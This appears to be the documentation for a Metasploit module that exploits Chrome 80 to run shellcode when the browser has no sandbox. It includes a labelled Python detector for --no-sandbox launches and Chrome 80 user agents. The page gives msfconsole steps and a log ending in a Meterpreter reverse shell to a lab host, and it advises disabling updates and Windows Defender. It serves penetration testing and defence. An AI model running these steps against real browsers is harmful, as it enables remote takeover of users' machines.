This module exploits an issue in Google Chrome 80.0.3987.87 (64-bit). The exploit corrupts the length of a float array (float_rel), which can then be used for out-of-bounds reads and writes on adjacent memory.
The relative read and write is then used to modify a UInt64Array (uint64_aarw), which is used for reading and writing absolute memory.
The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode.
**The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.**
## Vulnerable Application
The module is compatible with any 64-bit Google Chrome (version 80) on any platform (macOS, Linux or Windows); however, the code that writes the shellcode into the rwx region (wasm_rwx_addr) may need to be modified for different versions.
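As an added defensive check (not part of the module or of Chrome), the following Python flags the two exposure conditions this page describes: Chrome launched with `--no-sandbox`, and 64-bit Chrome 80 User-Agent strings in web or proxy logs. The process command lines and User-Agent strings are constructed samples.

```python
import re

# Constructed sample of process command lines, as a defender might collect
# them from endpoint telemetry (not output from the module or from Chrome).
SAMPLE_COMMAND_LINES = [
    r'"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox',
    r'"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer',
    r'"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"',
    r'C:\Windows\System32\notepad.exe --no-sandbox',
]

# Constructed sample User-Agent strings as they would appear in web server
# or proxy logs; the first matches the build this page names.
SAMPLE_USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36",
]

CHROME_EXE = re.compile(r'chrome\.exe"?(\s|$)', re.IGNORECASE)
# The flag must be a separate argument, not part of a longer token.
NO_SANDBOX = re.compile(r'(^|\s)--no-sandbox(\s|$)')
CHROME_UA = re.compile(r'Chrome/(\d+)\.(\d+)\.(\d+)\.(\d+)')
# Heuristic 64-bit markers for Windows and Linux user agents.
X64_MARKERS = ("Win64; x64", "x86_64")


def chrome_without_sandbox(command_lines):
    """Return the command lines that launch chrome.exe with --no-sandbox.

    The page notes the payload runs inside the renderer, so a sandbox-less
    Chrome is the configuration that turns this bug into code execution.
    """
    return [c for c in command_lines
            if CHROME_EXE.search(c) and NO_SANDBOX.search(c)]


def exposed_user_agents(user_agents, major=80):
    """Return User-Agents reporting 64-bit Chrome of the given major version."""
    hits = []
    for ua in user_agents:
        m = CHROME_UA.search(ua)
        if m and int(m.group(1)) == major and any(x in ua for x in X64_MARKERS):
            hits.append(ua)
    return hits
```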
**Vulnerable Application Installation Steps**
You can download a vulnerable Chrome version from this location:
[https://www.filepuma.com/download/google_chrome_64bit_80.0.3987.87-24545/](https://www.filepuma.com/download/google_chrome_64bit_80.0.3987.87-24545/)
You should ensure that the application does not update itself to the latest version (by disabling automatic updates or simply not connecting to the internet).
You may also need to disable Windows Defender.
## Verification Steps
1. Do: `use exploit/multi/browser/chrome_jscreate_sideeffect`
2. Do: `set payload windows/x64/meterpreter/reverse_tcp`
3. Do: `set LHOST [IP]`
4. Do: `set SRVHOST [IP]`
5. Do: `set URIPATH / [PATH]`
6. Do: `run`
## Scenarios
### Windows 10 and Google Chrome 80.0.3987.87 with --no-sandbox
Start Google Chrome without a sandbox:
`"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox`
```
msf5 > use exploit/multi/browser/chrome_jscreate_sideeffect
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set URIPATH /
URIPATH => /
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) >
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.

msf5 exploit(multi/browser/chrome_jscreate_sideeffect) >
[*] 192.168.56.3 chrome_jscreate_sideeffect - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36
[*] Sending stage (206403 bytes) to 192.168.56.3
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49677) at 2020-03-04 21:22:38 +0800

msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > sessions 1
[*] Starting interaction with 1...

meterpreter > pwd
C:\Program Files (x86)\Google\Chrome\Application\80.0.3987.87
meterpreter >
```